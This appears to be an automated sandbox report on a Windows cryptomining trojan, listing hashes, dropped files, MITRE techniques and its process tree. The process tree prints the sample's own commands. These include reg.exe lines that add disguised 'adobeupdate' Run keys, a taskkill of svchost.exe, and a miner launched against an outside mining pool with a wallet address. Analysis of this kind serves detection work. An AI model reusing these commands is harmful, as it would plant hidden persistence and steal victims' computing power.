15e1630c237684c6af411daf4739674d9e42cff419d8dd8928ec223a3e2aaed1

Analysis

max time kernel
117s
max time network
120s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
01-02-2024 02:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85b3ff5f3012c30d32ae85883f2d91be.exe
Size

556KB
MD5

85b3ff5f3012c30d32ae85883f2d91be
SHA1

80810371907c044772329629a283eafbbfd21f90
SHA256

15e1630c237684c6af411daf4739674d9e42cff419d8dd8928ec223a3e2aaed1
SHA512

e55eefb130efd72fa40c4d7084e8eeea55c98360ede4a524c705c8da57b899b8f197f46f75f3dcc282ace20f247db9b48a41a73bfd1df95c4538948492c836d0
SSDEEP

12288:PxaVAh64U5lEEfdq3dsvVqeIkHKebu/T1YPIUuW7FQod39:PxaVxr52oIdCTI2rchYPIUbFPd39

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2636	j.exe
344	svchost.exe

Loads dropped DLL 15 IoCs

pid	Process
2212	85b3ff5f3012c30d32ae85883f2d91be.exe
2212	85b3ff5f3012c30d32ae85883f2d91be.exe
2212	85b3ff5f3012c30d32ae85883f2d91be.exe
2212	85b3ff5f3012c30d32ae85883f2d91be.exe
2212	85b3ff5f3012c30d32ae85883f2d91be.exe
2212	85b3ff5f3012c30d32ae85883f2d91be.exe
2636	j.exe
2636	j.exe
2636	j.exe
2636	j.exe
344	svchost.exe
344	svchost.exe
344	svchost.exe
344	svchost.exe
344	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\adobeupdate = "\"C:\\Users\\Admin\\AppData\\Roaming\\3 7\\l3.lnk\""	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\adobeupdater = "\"C:\\Users\\Admin\\AppData\\Roaming\\3 7\\l3.lnk\""	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
2580	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1448	reg.exe
1492	reg.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	taskkill.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2212 wrote to memory of 2752	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	28
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2752 wrote to memory of 2580	2752	cmd.exe	30
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2212 wrote to memory of 2636	2212	85b3ff5f3012c30d32ae85883f2d91be.exe	32
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1448	2752	cmd.exe	34
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2752 wrote to memory of 1492	2752	cmd.exe	35
PID 2636 wrote to memory of 344	2636	j.exe	36
PID 2636 wrote to memory of 344	2636	j.exe	36
PID 2636 wrote to memory of 344	2636	j.exe	36
PID 2636 wrote to memory of 344	2636	j.exe	36
PID 2636 wrote to memory of 344	2636	j.exe	36
PID 2636 wrote to memory of 344	2636	j.exe	36
PID 2636 wrote to memory of 344	2636	j.exe	36

C:\Users\Admin\AppData\Local\Temp\85b3ff5f3012c30d32ae85883f2d91be.exe
"C:\Users\Admin\AppData\Local\Temp\85b3ff5f3012c30d32ae85883f2d91be.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\3 7\bat.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\SysWOW64\taskkill.exe
    C:\Windows\system32\taskkill.exe /im svchost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v adobeupdate /d "\"C:\Users\Admin\AppData\Roaming\3 7\l3.lnk\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1448
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add HKLM\software\microsoft\windows\currentversion\run /v adobeupdater /d "\"C:\Users\Admin\AppData\Roaming\3 7\l3.lnk\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1492
- C:\Users\Admin\AppData\Roaming\3 7\j.exe
  "C:\Users\Admin\AppData\Roaming\3 7\j.exe" "C:\Users\Admin\AppData\Roaming\3 7\svchost.exe" -o http://mining.eligius.st:8337 -u 1PbPiV1X9x8MGPw2jdoZdypZ3wYAuZmL7h -p x
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Users\Admin\AppData\Roaming\3 7\svchost.exe
    "C:\Users\Admin\AppData\Roaming\3 7\svchost.exe" "-o" "http://mining.eligius.st:8337" "-u" "1PbPiV1X9x8MGPw2jdoZdypZ3wYAuZmL7h" "-p" "x"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\3 7\OpenCL.dll

Filesize
50KB

MD5
6c5bde40d18116e6c592506a51e014da

SHA1
2afcec48a0453c9e8b699b70da0b7b323882cc7d

SHA256
5e37f84046c38b34fd45a7c3f62c68984fb61ebc02d57f878f17a8d97750c6b6

SHA512
a5d41a6575c3b86e07a48422378106970640b1ea6e8ee0426a0c4e7d79320626e14bc3c984376f4890ad2b8e77d17497b6d3592190a7691d31a4f724647e8131

Download Submit
C:\Users\Admin\AppData\Roaming\3 7\bat.bat

Filesize
318B

MD5
723944d8febda4becbe70811b7bcf77c

SHA1
efb7826876a1fa2ce32121fe97b3df29c780de73

SHA256
b2f6093cefccd78da522eae3dce7333910f4955d80271df8b97c04a1804c3ee4

SHA512
bee511e1f0fbaf976177ae70cbc2bf68185e0ce45c537a14bc72f9fa789e2c5c237737b9151be27cc86b8a036fea318a1ab743138912125cf72967c51733862d

Download Submit
C:\Users\Admin\AppData\Roaming\3 7\libcurl-4.dll

Filesize
280KB

MD5
c8dd0d50f5b8676e8a166595f3f1b1d2

SHA1
222116789ac4a5dc3a14d4a480ca907d2151f5bd

SHA256
493d1df5e74c271ce437e2cfd13b5e9dea79d05e286815e8b8541c937fe6ba4c

SHA512
b60e50aaf118d32b57872ef7843526949b2bab6343995f68c11cce26af52ed03d25e475a3d9fd003cf7a6eeb90cd576bbed4e937db2d6ffb2ec5f2caf98e3a8c

Download Submit
C:\Users\Admin\AppData\Roaming\3 7\libusb-1.0.dll

Filesize
173KB

MD5
7f2523dec5fa92c70f3ab13765d799ff

SHA1
f94a6cc07fa8aa680e3776df30e5171ce884fd0e

SHA256
7ceb91390ac581b78be8a18a6eebf7f9124a2460c4f9849ee4c75ec303412062

SHA512
33190cab913efaa7903b1cf1c9525bc2688cc7f954289bd2776e0bf141e4a78fd4f34cf0242e4da8ef30c3c6816da7d22573f645caa3b26571b9bd900dd31a37

Download Submit
C:\Users\Admin\AppData\Roaming\3 7\pdcurses.dll

Filesize
85KB

MD5
1b364ec27b6f4f8879dabadb096a4f64

SHA1
1306650116ed181165d8cbc4098b07c0b08fcd09

SHA256
94995b0560d2ccda7951252397eb152b499454746b75d03479bbfa551def41e4

SHA512
bc7232055b0bd65c92197898b4eef3a6e92e6e8b55280a9f971d7bb147057800c9bc980dd9f10ec155ccf153679d55df3a3997ced04bf1d35d4e6376764e2dbc

Download Submit
C:\Users\Admin\AppData\Roaming\3 7\pthreadGC2.dll

Filesize
66KB

MD5
8bc13c002f91cff22a17f5a5191c1292

SHA1
113b3d47ce52fd13e0c8038257c3ae05f3a1a9ff

SHA256
97c1a2cabfe69b987732a1502dac6cce9c6e31f6f7e9142fc4bc8d92077f2da3

SHA512
e78a607c48e1ff1362aadf298f679f716e0f8ded48cd4b835fe688a9f8cdb4ce8b227c2b71b78826f10285302d414b64082bf500ef471f1342bd4bc7f87e8033

Download Submit
C:\Users\Admin\AppData\Roaming\3 7\svchost.exe

Filesize
434KB

MD5
34ed4d5e131ad520074842f3a4562950

SHA1
639c23a2f56d4c6f48d6ae9f3dc856bbc98d13d3

SHA256
7c789c86b493cda5c10dc802720f8032f547c65c8191a234a2aaba8070520a8b

SHA512
cdaf85e029ac440f3a00b4059f27eaa1dedd8592b0b1dae3554b913bb08f59e01580e68d3fdc589bb2000b7257c445ea5216bc505b54380ce7811fb43ee4839a

Download Submit
\Users\Admin\AppData\Roaming\3 7\j.exe

Filesize
136KB

MD5
935809d393a2bf9f0e886a41ff5b98be

SHA1
1ed3fc1669115b309624480e88c924b7b67e73bb

SHA256
c92904610319843578ada35fb483d219b0d07da69179d57c7e1223cab078492c

SHA512
46bccaaba4b8b4cfa247f48b55998d13b37f714ac69f6b08a97b6b8075f61233545406bc9f8db7d2848f1831eeb506da650b72d7d3a2f624e51eccd5fc537bc5

Download Submit
memory/344-91-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/344-92-0x0000000070800000-0x0000000070842000-memory.dmp

Filesize
264KB

Download
memory/344-95-0x000000006B600000-0x000000006B62F000-memory.dmp

Filesize
188KB

Download
memory/344-94-0x0000000062480000-0x0000000062499000-memory.dmp

Filesize
100KB

Download
memory/344-93-0x0000000062200000-0x000000006221C000-memory.dmp

Filesize
112KB

Download
memory/2636-80-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads